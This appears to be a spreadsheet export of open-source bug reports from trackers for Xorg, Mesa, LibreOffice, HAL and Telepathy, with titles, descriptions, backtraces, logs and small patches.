  <si>
    <t>FREEDESKTOP.ORG-1025</t>
  </si>
  <si>
    <t>can't get the users to watch mail setting to work</t>
  </si>
  <si>
    <t>I added jrb@redhat.com in the users to watch field of the email settings user
preferences about 10 days ago and I didn't get any mail from bugzilla even
though some new bugs were filed and assigned to jrb@redhat.com (bug #1001 and
#1002 for example)</t>
  </si>
  <si>
    <t>LIBREOFFICE-69289</t>
  </si>
  <si>
    <t>DATALOSS: column is lost and replaced with previously hidden column after save and reopen when copying a table with hidden columns from calc to writer</t>
  </si>
  <si>
    <t>Create a table in calc 3 columns. Hide the second column. copy the resulting table with two columns in a Skeeter format RTF. save a text document in a format writer. odt. Close libreoffice. open the saved file. the second column is inserted into the table replace the hidden column of calc.</t>
  </si>
  <si>
    <t>79045_79045</t>
  </si>
  <si>
    <t>LIBREOFFICE-51895</t>
  </si>
  <si>
    <t>Irritating tilde (~) character at beginning of German buttons captions introduced in 3.6b3</t>
  </si>
  <si>
    <t>Created attachment 64002
Global application Options dialog in 3.6b3 with German UI
In LibreOffice 3.6 beta 3 for MacOS X (did not test Windows and Linux) if you install and select the German langpack the caption of certain buttons in different dialog windows begins with a spurious '~' e.g. ~OK and ~Abbrechen instead of OK and Abbrechen.
I can't test all LibreOffice dialogs but at least all instances of OK and Abbrechen in the (application) Options dialog and in Writer's Paragraph and Character dialogs are concerned.
This problem is brand new in beta 2 there was NO '~' at the beginning of these captions.
The problem is not present in the default (US English) locale there the same buttons have the correct captions OK and Cancel.
I will attach some screenshots showing the spurious '~'.
This is a minor issue but nevertheless it needs attentions because it makes LibreOffice look rather unprofessional and ugly.</t>
  </si>
  <si>
    <t>MESA-40034</t>
  </si>
  <si>
    <t>E-350 misprocesses shader</t>
  </si>
  <si>
    <t>Created attachment 50154
Screenshot of the failure
If you pull from my e350bug branch ( http://cgit.freedesktop.org/~cand/mesa/log/?h=e350bug ) and execute pp_jimenezmlaa=8 glxgears you should see a fully white window. What actually happens on the E-350 is attached.
The gist is a long shader output = white which should always create white since the shader has no kilp/discard. While this would rarely happen in practise (the glsl compiler would eliminate dead code) this is a clear bug and I believe this is causing me other grief.
While the branch is based on ~4 weeks old master the bug is present when merged with today's master.
The kernel I'm on is 3.0.1.</t>
  </si>
  <si>
    <t>XORG-5130</t>
  </si>
  <si>
    <t>Cannot find a replacement momory range</t>
  </si>
  <si>
    <t>X Window System Version 6.8.99.15
Release Date: 16 July 2005 + cvs
X Protocol Version 11 Revision 0 Release 6.8.99.15
Build Operating System: Linux 2.6.14-suspend2-s050414 i686 [ELF]
Current Operating System: Linux s050414 2.6.14-suspend2-s050414 #6 PREEMPT Tue
Nov 22 21:16:01 CET 2005 i686
Build Date: 22 November 2005
        Before reporting problems check http://wiki.X.Org
        to make sure that you have the latest version.
Module Loader present
Markers: (--) probed (**) from config file (==) default setting
        (++) from command line (!!) notice (II) informational
        (WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.0.log Time: Tue Nov 22 21:26:03 2005
(==) Using config file: /root/xorg.conf
(WW) ****INVALID MEM ALLOCATION**** b: 0xd0000000 e: 0xd8000000 correcting
(WW) ****INVALID IO ALLOCATION**** b: 0x6000 e: 0x6100 correcting
Requesting insufficient memory window!: start: 0x6000 end: 0x60ff size 0xc8120100
Requesting insufficient memory window!: start: 0x6400 end: 0x64ff size 0xc8120100
Requesting insufficient memory window!: start: 0x6800 end: 0x68ff size 0xc8120100
Requesting insufficient memory window!: start: 0x6c00 end: 0x6cff size 0xc8120100
(EE) Cannot find a replacement memory range
I use the cvs radeon drivers compiled like:
http://forums.gentoo.org/viewtopic-t-374745-highlight-r300.html
with gcc 3.4.4 on a gentoo box.
part of emerge --info:
s050414 ~ # emerge --info
(default-linux/x86/2005.1 gcc-3.4.4 glibc-2.3.5-r3 2.6.14-                  
                                 suspend2-s050414 i686)
=================================================================
System uname: 2.6.14-suspend2-s050414 i686 Intel(R) Pentium(R) M processor 1.86G
                                                     Hz
Gentoo Base System version 1.12.0_pre10
ccache version 2.4 [enabled]
dev-lang/python:     2.3.5 2.4.2
sys-apps/sandbox:    1.2.13
sys-devel/autoconf:  2.13 2.59-r7
sys-devel/automake:  1.4_p6 1.5 1.6.3 1.7.9-r1 1.8.5-r3 1.9.6-r1
sys-devel/binutils:  2.16.1
sys-devel/libtool:   1.5.20-r1
virtual/os-headers:  2.6.11-r3</t>
  </si>
  <si>
    <t>habraken</t>
  </si>
  <si>
    <t>XORG-23048</t>
  </si>
  <si>
    <t>evdev: SIGSEGV in EvdevMBEmuBlockHandler()</t>
  </si>
  <si>
    <t>Created attachment 28207
ThreadStacktrace.txt
Forwarding this widely reported Ubuntu bug:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-input-evdev/+bug/343528
[Problem]
X crash in EvdevMBEmuBlockHandler() seen in Jaunty and Karmic (with -evdev 2.2.2).  Occurs rarely with no obvious/known steps to reproduce.
[Original Report]
I wasn't doing anything new the time this program crashed. The screen went blank for a few seconds with some vertical colored strands crossing here and there Then a command-line display came up with a few error messages. The system then went to the login window. From there everything worked fine. I have a feeling that this happened because I'm putting too much pressure on my machine. At the time I was having wuala transmission firefox xchat working. And by the way this is not the first time this crash happened but I didn't get the crash report in previous crashed because I've rebooted the system right after it happened.
$ lsb_release -rd
Description: Ubuntu jaunty (development branch)
Release: 9.04
ProblemType: Crash
Architecture: i386
DistroRelease: Ubuntu 9.04
ExecutablePath: /usr/bin/Xorg
Package: xserver-xorg-core 2:1.6.0-0ubuntu1
ProcAttrCurrent: unconfined
ProcCmdline: /usr/X11R6/bin/X :0 -br -audit 0 -auth /var/lib/gdm/:0.Xauth -nolisten tcp vt7
ProcEnviron:
 LANGUAGE=ar_SA:ar
 PATH=(custom no user)
 LANG=ar_SA.UTF-8
ProcVersion: Linux version 2.6.28-9-generic (buildd@palmer) (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu2) ) #31-Ubuntu SMP Wed Mar 11 15:43:58 UTC 2009
Signal: 11
SourcePackage: xorg-server
StacktraceTop:
 EvdevMBEmuBlockHandler ()
 BlockHandler ()
 WaitForSomething ()
 Dispatch ()
 main ()
Title: Xorg crashed with SIGSEGV in EvdevMBEmuBlockHandler()
Uname: Linux 2.6.28-9-generic i686</t>
  </si>
  <si>
    <t>MESA-97273</t>
  </si>
  <si>
    <t>[r600g bisected] regression: NI/Turks WebGL (FishGL) massive speed decrease ~33%</t>
  </si>
  <si>
    <t>Current Mesa (git-3f100b7) and some stable versions show massive speed decrease on FishGL (WebGL) demo with konqueror 4.14.8 (KDE 4.14.9).
http://www.fishgl.com/
look at the aquarium: ~60 fps -&gt; ~40 fps
look from inside (diver): ~30 fps -&gt; ~20 fps
I've bisected it to:
/opt/mesa&gt; git bisect good                                                                        3735a925ef5692c836c4d26d6adee370dae1c2b0 is the first bad commit
commit 3735a925ef5692c836c4d26d6adee370dae1c2b0
Author: Nicolai HÃ¤hnle 
Date:   Wed Jun 8 13:24:14 2016 +0200
    st/mesa: cache staging texture for glReadPixels
    v2: add ST_DEBUG flag for disabling (suggested by Ilia)
    Reviewed-by: Marek OlÅ¡Ã¡k  (v1)
:040000 040000 f3adb5adc43e4def32bd23896489520d8cae84c6 72b374e2221e9cc1306d7bfacf39780ec5e42d36 Msrc
https://cgit.freedesktop.org/mesa/mesa/log/?ofs=1150
Revert didn't went smooth so I've commented:
diff --git a/src/mesa/state_tracker/st_cb_readpixels.c b/src/mesa/state_tracker/st_cb_readpixels.c
index 8eb839d..3af9530 100644
--- a/src/mesa/state_tracker/st_cb_readpixels.c
+++ b/src/mesa/state_tracker/st_cb_readpixels.c
@@ -3297 +3297 @@ try_cached_readpixels(struct st_context *st struct st_renderbuffer *strb
    struct pipe_resource *src = strb-&gt;texture
    struct pipe_resource *dst = NULL
-   if (ST_DEBUG &amp; DEBUG_NOREADPIXCACHE)
+ /*  if (ST_DEBUG &amp; DEBUG_NOREADPIXCACHE) */
       return NULL
    /* Reset cache after invalidation or switch of parameters. */
After that speed was 'normal'.</t>
  </si>
  <si>
    <t>DBUS-2494</t>
  </si>
  <si>
    <t>dbus installs python lib in wrong location</t>
  </si>
  <si>
    <t>you need to use pyexecdir instead of pythondir for the shared objects</t>
  </si>
  <si>
    <t>WOCKY-27488</t>
  </si>
  <si>
    <t>re-order some arguments to put the GError ** at the end to be nice to Vala</t>
  </si>
  <si>
    <t>Cloned from Bug #27244:
&gt; One more thing slightly off-topic would you be okay with changing
&gt; wocky_connector_{connectregister}_finish so the GError is put as the last
&gt; argument instead of middle? That would make Vala async binding just work. :-)</t>
  </si>
  <si>
    <t>MESA-5092</t>
  </si>
  <si>
    <t>Unichrome (K8M800) locks up when working with textures</t>
  </si>
  <si>
    <t>Unichrome Pro (K8N800/Mitac 8889 chipset) hangs up the computer when handling
textures. The bug can be seen almost in any OpenGL game (I've tested PPracer
Trigger Torcs FlightGear AlephOne). Sometimes you are able to start the game
(maybe after some tweaking in resolution bpp fulscreen mode etc) but after
some minutes it hangs up and you need to press Power button on your computer.
Steps to reproduce (using Trigger as example):
1. Download Trigger from (http://www.positro.net/trigger/) and install it
2. Choose Single Race-&gt;Far far away-&gt;Start Race from the game menu.
Expected result:
You should see an outline of the car rotating and be able to choose another car
by pressing cursor keys.
Actual result:
The computer hangs and you need to press Power button.
I've did some debugging and found that 3D driver apparently doesn't like
GL_LINEAR_MIPMAP_LINEAR texture parameter. A trivial workaround for via_state.c
(which makes Trigger 0.5.1c to work) is attached. However this does not solve
the problem completely: FlightGear anf Torcs (and probably other games I have'nt
tested) are still locking up my machine.</t>
  </si>
  <si>
    <t>e_val</t>
  </si>
  <si>
    <t>DRI-104834</t>
  </si>
  <si>
    <t>does not boot opensuse on fujitsu-siemens platform on cpu t2400-t7200</t>
  </si>
  <si>
    <t>Created attachment 137020
photo of screen on fujitsu-siemens S7110
Laptops Fujitsu-Siemens S7110 and E8110 Does not boot on Opensuse 4.14.14.1-vanilla kernel.</t>
  </si>
  <si>
    <t>virex</t>
  </si>
  <si>
    <t>SPECIFICATIONS-39775</t>
  </si>
  <si>
    <t>no place to file non educational medical software.</t>
  </si>
  <si>
    <t>There is no main cagegory for non-graphical non-educational medical software.
Suggest main category Medical. Note: According to the specification additional categories can only be used with a Main classification. What if no main classification applies?</t>
  </si>
  <si>
    <t>pelliott</t>
  </si>
  <si>
    <t>XORG-29994</t>
  </si>
  <si>
    <t>xauth list hangs in resolver</t>
  </si>
  <si>
    <t>$ export XAUTHORITY=/tmp/xauth
$ xauth add 169.254.0.1:0 foo aa
xauth:  creating new authority file /tmp/xauth
$ xauth add 169.254.0.2:0 foo aa
$ xauth list
169.254.0.1:0  foo  aa
[hangs]
The problem is that gethost.c:get_hostname sets up an alarm handler that jumps out of the handler but gethostbyaddr is not (required to be) async signal safe.  Thus when the resolver takes more than 4 seconds the alarm handler interrupts the call and jumps out of it leaving behind some internal mutexes in locked state.  The next call to gethostbyaddr will wait for the mutexes to be released which will never happen.  The whole alarm setup should be removed.</t>
  </si>
  <si>
    <t>schwab</t>
  </si>
  <si>
    <t>XTESTS-9520</t>
  </si>
  <si>
    <t>Markup problems in Xmark.1x</t>
  </si>
  <si>
    <t>If you are not the right person or list tell
me and I will attempt to correct my database.
See http://catb.org/~esr/doclifter/problems.html for details on how and
why these patches were generated.  Feel free to email me with any questions.
Note: These patches do not change the mod date of any manual page.  You
may wish to do that by hand.
Problems with Xmark.1x:
Use of low-level troff hackery to set special indents or breaks can't
be translated. The page will have rendering faults in HTML and
probably also under third-party man page browsers such as Xman TkMan
Rosetta and the KDE help browser.
--- Xmark.1x-orig	2007-01-02 10:44:55.000000000 -0500
+++ Xmark.1x	2007-01-02 10:45:57.000000000 -0500
@@ -3315 +3317 @@
 It is possible to run the GXcopy and GXxor tests separately as long as they
 are concatenated to the same output file:
 .PP
+.nf
 .BI x11perf -display  display  -v1.3 -rop GXcopy -all &gt;  datafile 
-.br
 .BI x11perf -display  display  -v1.3 -rop GXxor -all &gt;&gt;  datafile 
+.fi
 .PP
 or
 .PP
+.nf
 .BI x11perf -display  display  -v1.3 -rop GXxor -all &gt;  datafile 
-.br
 .BI x11perf -display  display  -v1.3 -rop GXcopy -all &gt;&gt;  datafile 
+.fi
 .PP
 .SH FILES
 .TP</t>
  </si>
  <si>
    <t>XORG-17576</t>
  </si>
  <si>
    <t>[GEM] X crash with xserver 1.5 GIT xf86-intel-driver</t>
  </si>
  <si>
    <t>Created attachment 18867
Xorg conf
bt of xorg:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb7af06c0 (LWP 4551)]
0xb79d6f02 in xf86ExecX86int10 () from /usr/lib/xorg/modules//libint10.so
(gdb) bt
#0  0xb79d6f02 in xf86ExecX86int10 () from /usr/lib/xorg/modules//libint10.so
#1  0xb7747ab0 in VBEExtendedInit () from /usr/lib/xorg/modules//libvbe.so
#2  0xb7747eba in VBEInit () from /usr/lib/xorg/modules//libvbe.so
#3  0xb79f819d in i830_bios_init (pScrn=0x8215370) at i830_bios.c:194
#4  0xb7a04e6d in I830PreInit (pScrn=0x8215370 flags=)
    at i830_driver.c:1912
#5  0x080a8441 in InitOutput ()
#6  0x080717cb in main ()
See attached files for xorg log and dmesg</t>
  </si>
  <si>
    <t>XORG-14689</t>
  </si>
  <si>
    <t>Invalid read in XCreateFontCursor</t>
  </si>
  <si>
    <t>Created attachment 14590
Simple Program Demonstrating the bug
I noticed this error in valgrind yesterday when testing cursor support in my library. I wrote a minimal program to confirm this bug. Here's the output
from valgrind:
==7921== Invalid read of size 8
==7921==    at 0x4015B3E: (within /lib/ld-2.6.1.so)
==7921==    by 0x400A8F7: (within /lib/ld-2.6.1.so)
==7921==    by 0x4006174: (within /lib/ld-2.6.1.so)
==7921==    by 0x40085F7: (within /lib/ld-2.6.1.so)
==7921==    by 0x4011C98: (within /lib/ld-2.6.1.so)
==7921==    by 0x400DA05: (within /lib/ld-2.6.1.so)
==7921==    by 0x401155A: (within /lib/ld-2.6.1.so)
==7921==    by 0x6B17F8A: (within /lib/libdl-2.6.1.so)
==7921==    by 0x400DA05: (within /lib/ld-2.6.1.so)
==7921==    by 0x6B184EC: (within /lib/libdl-2.6.1.so)
==7921==    by 0x6B17EF0: dlopen (in /lib/libdl-2.6.1.so)
==7921==    by 0x505FB9C: (within /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50601B3: XCreateGlyphCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50605F0: XCreateFontCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x400A53: main (main.cpp:15)
==7921==  Address 0x7162b68 is 24 bytes inside a block of size 25 alloc'd
==7921==    at 0x4C21FAB: malloc (vg_replace_malloc.c:207)
==7921==    by 0x4008AF5: (within /lib/ld-2.6.1.so)
==7921==    by 0x4011C98: (within /lib/ld-2.6.1.so)
==7921==    by 0x400DA05: (within /lib/ld-2.6.1.so)
==7921==    by 0x401155A: (within /lib/ld-2.6.1.so)
==7921==    by 0x6B17F8A: (within /lib/libdl-2.6.1.so)
==7921==    by 0x400DA05: (within /lib/ld-2.6.1.so)
==7921==    by 0x6B184EC: (within /lib/libdl-2.6.1.so)
==7921==    by 0x6B17EF0: dlopen (in /lib/libdl-2.6.1.so)
==7921==    by 0x505FB9C: (within /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50601B3: XCreateGlyphCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50605F0: XCreateFontCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x400A53: main (main.cpp:15)
==7921== 
==7921== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 7 from 1)
==7921== malloc/free: in use at exit: 27232 bytes in 285 blocks.
==7921== malloc/free: 1020 allocs 735 frees 112877 bytes allocated.
==7921== For counts of detected errors rerun with: -v
==7921== searching for pointers to 285 not-freed blocks.
==7921== checked 350488 bytes.
==7921== 
==7921== 
==7921== 192 (16 direct 176 indirect) bytes in 1 blocks are definitely lost in loss record 10 of 22
==7921==    at 0x4C22082: realloc (vg_replace_malloc.c:429)
==7921==    by 0x50984F9: (within /usr/lib/libX11.so.6.2.0)
==7921==    by 0x5098D2F: (within /usr/lib/libX11.so.6.2.0)
==7921==    by 0x509A675: _XlcCreateLC (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50B629F: _XlcDefaultLoader (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50A0B43: _XOpenLC (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50A0C0A: _XrmInitParseInfo (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50886CF: (within /usr/lib/libX11.so.6.2.0)
==7921==    by 0x5089E6D: XrmGetStringDatabase (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x506668F: XGetDefault (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x755DD43: _XcursorGetDisplayInfo (in /usr/lib/libXcursor.so.1.0.2)
==7921==    by 0x755DF08: XcursorSupportsARGB (in /usr/lib/libXcursor.so.1.0.2)
==7921==    by 0x7560759: XcursorTryShapeCursor (in /usr/lib/libXcursor.so.1.0.2)
==7921==    by 0x5060093: XCreateGlyphCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x50605F0: XCreateFontCursor (in /usr/lib/libX11.so.6.2.0)
==7921==    by 0x400A53: main (main.cpp:15)
==7921== 
==7921== LEAK SUMMARY:
==7921==    definitely lost: 16 bytes in 1 blocks.
==7921==    indirectly lost: 176 bytes in 4 blocks.
==7921==      possibly lost: 0 bytes in 0 blocks.
==7921==    still reachable: 27040 bytes in 280 blocks.
==7921==         suppressed: 0 bytes in 0 blocks.
The leak may deserve some attention too but oddly it doesn't appear in my library where this invalid read does.
X -version returns:
X Window System Version 1.3.0
Release Date: 19 April 2007
X Protocol Version 11 Revision 0 Release 1.3
Build Operating System: Linux Ubuntu (xorg-server 2:1.3.0.0.dfsg-12ubuntu8.3)
Current Operating System: Linux localhost 2.6.22-14-generic #1 SMP Tue Feb 12 02:46:46 UTC 2008 x86_64
Build Date: 18 January 2008
Sorry if this isn't the latest version but I'm testing on Ubuntu whose packages don't remotely keep up with latest versions.
The version of valgrind I'm using is 3.3.0.</t>
  </si>
  <si>
    <t>realmi2</t>
  </si>
  <si>
    <t>DRI-104019</t>
  </si>
  <si>
    <t>[IGT] tools_test@tools_test fails without any output and platform dies</t>
  </si>
  <si>
    <t>Created attachment 135858
kernel log
The following test case is falling on CNL with latest configuration.
tools_test@tools_test
Steps:
1-Run sudo -E ./tools_test --r tools_test --d
2-Watch how the platform hard hangs 
Note:
The test doesn't produce any kind of output and platform stays unresponsive until a hard reset is performed.</t>
  </si>
  <si>
    <t>XORG-21415</t>
  </si>
  <si>
    <t>corrupted layout with intel-2.7.0 and xorg-1.6.1</t>
  </si>
  <si>
    <t>Created attachment 25152
Corrupted layout
Section Device
        Identifier      Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller
        Driver          intel
        BusID           PCI:0:2:0
        Option          AccelMethod                   UXA
EndSection
rahul@googly ~ $ uname -a
Linux googly 2.6.30-rc2-zen0-08372-gb1961bf-dirty #7 SMP PREEMPT Sun Apr 26 16:17:05 CEST 2009 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz GenuineIntel GNU/Linux
Kernel uses this patch
http://git.kernel.org/?p=linux/kernel/git/anholt/drm-intel.gita=commitdiff_plainh=f544847fbaf099278343f875987a983f2b913134hp=cd97824994042b809493807ea644ba26c0c23290
For corruption see the attached image.</t>
  </si>
  <si>
    <t>rahul</t>
  </si>
  <si>
    <t>LIBREOFFICE-30900</t>
  </si>
  <si>
    <t>OFFSET function doesn't work when used within named range.</t>
  </si>
  <si>
    <t>Originally reported here:
http://the-document-foundation.969070.n3.nabble.com/OFFSET-function-don-t-works-tt1700974.html
I quote:
---
Hi
I frequently use OFFSET in Insert &gt; Name &gt; Define for create Drop down lists.
The array formula =OFFSET(A1001COUNTA(A1:H1)) returns Error 504 with LibO Beta2.
May be it's a collateral damage of the resolution of this bug : http://qa.openoffice.org/issues/show_bug.cgi?id=103331
Thanks to have a look.
GÃ©rard
---</t>
  </si>
  <si>
    <t>XORG-16039</t>
  </si>
  <si>
    <t>uneeded access to /sys/bus/pci crashes Xserver</t>
  </si>
  <si>
    <t>On systems without PCI (like ps3) /sys/bus/pci is not created. The Xserver tries to accessed this file even if the driver is fbdev which causes the server to crash.
There is a fedora bug at https://bugzilla.redhat.com/show_bug.cgi?id=447593 which also describes the problem including backtrace.</t>
  </si>
  <si>
    <t>LIBREOFFICE-62154</t>
  </si>
  <si>
    <t>Opentype feature 'locl' not active</t>
  </si>
  <si>
    <t>Since v4 Opentype features are supported but some of those that should be active by default arenâ€™t. Among others such important ones as ccmp (Character composition and decomposition) and locl (localized forms).
Steps to reproduce:
With Linux Libertine (non Graphite version) type cyrillic letters Ð± Ð´ Ð³ Ð¿ Ñ‚ make them italic and mark them as serbian. They should now show serbian localized forms.
With EB Garamond 12: enter the letter â€œaâ€ followed by uni0304 (combining macron) and uni0301 (combining acute) (under Gnome type ctrl+shift+u+304 and ctrl+shift+u+301 for other systems youâ€™ll have to look up how to enter arbitrary unicode characters or copy this: aÌ„Ì ). It should show a perfectly stacking accent combination.</t>
  </si>
  <si>
    <t>g.duffner</t>
  </si>
  <si>
    <t>TELEPATHY-28797</t>
  </si>
  <si>
    <t>generated client code should be able to set a non-default timeout</t>
  </si>
  <si>
    <t>We've been assuming in telepathy-spec design in at least a few places that longer-than-default method timeouts are possible this makes it possible to implement RequestContactList() on Conn.I.ContactList and RequestContactInfo on Conn.I.ContactInfo for instance.
However telepathy-qt4 doesn't allow this. On closer inspection this is really a QtDBus bug - QDBusAbstractInterface::asyncCall and friends can't set a non-default timeout either!
It might be possible to work around this with QDBusConnection::callWithCallback for the few places where we need it.
I think the long-term solution would be for QtDBus to gain this optional argument:
QDBusPendingCall QDBusAbstractInterface::asyncCallWithArgumentList (const QString 
(Requiring construction of a QList for the unusual case is no big deal IMO.)</t>
  </si>
  <si>
    <t>SCIM-1219</t>
  </si>
  <si>
    <t>IMEngine: Other</t>
  </si>
  <si>
    <t>SCIM</t>
  </si>
  <si>
    <t>In xooffice 1.1.2 there  input twice some charactor when using scim-hangul</t>
  </si>
  <si>
    <t>Bad:
When I try to save or save asI can put Korean but there is a some problem.
http://pds.egloos.com/pds/1/200408/28/72/b0006872_19403126.jpg
that image show them more clearly.
That happen only in save and save as file name.
Good:
Except that they work correctly with ximian-open-office-1.1.2.
PS
I just test other XIM Other Korean XIM work correctly so I think
that is bug and reporing now.</t>
  </si>
  <si>
    <t>neeum</t>
  </si>
  <si>
    <t>HAL-18861</t>
  </si>
  <si>
    <t>udevadm trigger causes HAL to duplicate some udi</t>
  </si>
  <si>
    <t>Created attachment 20758
lshal output
running udevadm trigger cause HAL to have two udi's for the same devices i have Ubuntu 8.10 on a acer laptop with hal version 0.5.11.
in lshal i see 2 udi for my battery and 2 for laptop_panel.
Please let me know if you need more information.</t>
  </si>
  <si>
    <t>aliov</t>
  </si>
  <si>
    <t>TELEPATHY-21013</t>
  </si>
  <si>
    <t>ChannelRequest does not have the PreferredHandler</t>
  </si>
  <si>
    <t>MC 5 passes PreferredHandler into Handler.AddRequest as if it was a property of the ChannelRequest but this property does not actually exist. Perhaps it should.</t>
  </si>
  <si>
    <t>HAL-19440</t>
  </si>
  <si>
    <t>Request to add card reader to 10-usb-card-readers.fdi</t>
  </si>
  <si>
    <t>My 9-in-1 Card Reader was not recognized by hal. I would like the
following to be added to the 10-usb-card-readers.fdi file:
        compact_flash
        memory_stick
        smart_media
        sd_mmc
This makes it work for me.
dmesg info:
[    8.525481] scsi 6:0:0:0: Direct-Access     USB2.0   CardReader CF RW
0.0&gt; PQ: 0 ANSI: 0
[    8.527131] sd 6:0:0:0: [sdd] Attached SCSI removable disk
[    8.527851] sd 6:0:0:0: Attached scsi generic sg4 type 0
[    8.529025] scsi 6:0:0:1: Direct-Access     USB2.0   CardReader SD RW
0.0&gt; PQ: 0 ANSI: 0
[    8.530936] sd 6:0:0:1: [sde] Attached SCSI removable disk
[    8.530998] sd 6:0:0:1: Attached scsi generic sg5 type 0
[    8.532863] scsi 6:0:0:2: Direct-Access     USB2.0   CardReader SM RW
0.0&gt; PQ: 0 ANSI: 0
[    8.535812] sd 6:0:0:2: [sdf] Attached SCSI removable disk
[    8.535871] sd 6:0:0:2: Attached scsi generic sg6 type 0
[    8.536854] scsi 6:0:0:3: Direct-Access     USB2.0   CardReader MS RW
0.0&gt; PQ: 0 ANSI: 0
[    8.538310] sd 6:0:0:3: [sdg] Attached SCSI removable disk
[    8.538379] sd 6:0:0:3: Attached scsi generic sg7 type 0
[    8.538531] usb-storage: device scan complete
usb info:
07cc:0350    Carry Computer Eng. Co. Ltd    9-in-1 Card Reader
lsusb info:
Bus 001 Device 005: ID 07cc:0350 Carry Computer Eng. Co. Ltd
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x07cc Carry Computer Eng. Co. Ltd
  idProduct          0x0350
  bcdDevice            0.05
  iManufacturer           1         Ltd
  iProduct                2 Winter Ver1.3   
  iSerial                 3 394609411836
  bNumConfigurations      1
  Configuration Descriptor:
    bLength                 9
    bDescriptorType         2
    wTotalLength           32
    bNumInterfaces          1
    bConfigurationValue     1
    iConfiguration          0
    bmAttributes         0x80
      (Bus Powered)
    MaxPower              500mA
    Interface Descriptor:
      bLength                 9
      bDescriptorType         4
      bInterfaceNumber        0
      bAlternateSetting       0
      bNumEndpoints           2
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk (Zip)
      iInterface              4 1.06.30.0704
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x81  EP 1 IN
        bmAttributes            2
          Transfer Type            Bulk
          Synch Type               None
          Usage Type               Data
        wMaxPacketSize     0x0200  1x 512 bytes
        bInterval               0
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x02  EP 2 OUT
        bmAttributes            2
          Transfer Type            Bulk
          Synch Type               None
          Usage Type               Data
        wMaxPacketSize     0x0200  1x 512 bytes
        bInterval               0
Device Qualifier (for other device speed):
  bLength                10
  bDescriptorType         6
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  bNumConfigurations      1
Device Status:     0x0000
  (Bus Powered)</t>
  </si>
  <si>
    <t>joeri</t>
  </si>
  <si>
    <t>MESA-96978</t>
  </si>
  <si>
    <t>[IVB BYT] Implement stencil texturing</t>
  </si>
  <si>
    <t>The following assertions were found in CI when the generic ISL-based path was enabled.
mesa 8521ce1a7ecb2e67f259d92c645a18ffbc49d347
i965/gen7: Use the generic ISL-based path for texture surfaces
Signed-off-by: Jason Ekstrand 
Reviewed-by: Topi Pohjolainen 
Reviewed-by: Chad Versace 
regresses BYTHSWIVB
cts.gtf.gl3tests.packed_depth_stencil.packed_depth_stencil_stenciltexturing
deqp-gles31.functional.stencil_texturing.format.depth24_stencil8_2d
deqp-gles31.functional.stencil_texturing.format.depth24_stencil8_2d_array
deqp-gles31.functional.stencil_texturing.format.depth24_stencil8_cube
deqp-gles31.functional.stencil_texturing.format.depth32f_stencil8_2d
deqp-gles31.functional.stencil_texturing.format.depth32f_stencil8_2d_array
deqp-gles31.functional.stencil_texturing.format.depth32f_stencil8_cube
deqp-gles31.functional.stencil_texturing.misc.base_level
deqp-gles31.functional.stencil_texturing.render.depth24_stencil8_clear
deqp-gles31.functional.stencil_texturing.render.depth24_stencil8_draw
deqp-gles31.functional.stencil_texturing.render.depth32f_stencil8_clear
deqp-gles31.functional.stencil_texturing.render.depth32f_stencil8_draw
deqp-gles31.functional.texture.border_clamp.formats.depth24_stencil8_sample_stencil.gather_size_npot
deqp-gles31.functional.texture.border_clamp.formats.depth24_stencil8_sample_stencil.gather_size_pot
deqp-gles31.functional.texture.border_clamp.formats.depth32f_stencil8_sample_stencil.gather_size_npot
deqp-gles31.functional.texture.border_clamp.formats.depth32f_stencil8_sample_stencil.gather_size_pot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_clamp_to_edge_t_clamp_to_border_npot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_clamp_to_edge_t_clamp_to_border_pot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_mirrored_repeat_t_clamp_to_border_npot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_mirrored_repeat_t_clamp_to_border_pot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_repeat_t_clamp_to_border_npot
deqp-gles31.functional.texture.border_clamp.per_axis_wrap_mode.texture_2d.uint_stencil.gather.s_repeat_t_clamp_to_border_pot
mesa 366a6a659d00442631a939d7de80b239b943f6e7
i965/blorp: Use the generic ISL path for texture surfaces on gen7
Signed-off-by: Jason Ekstrand 
Reviewed-by: Topi Pohjolainen 
Reviewed-by: Chad Versace 
regresses BYTHSWIVB:
piglit.spec.ext_framebuffer_multisample_blit_scaled.blit-scaled samples.2 with gl_texture_2d_multisample_array
piglit.spec.ext_framebuffer_multisample_blit_scaled.blit-scaled samples.4 with gl_texture_2d_multisample_array
Assertions:
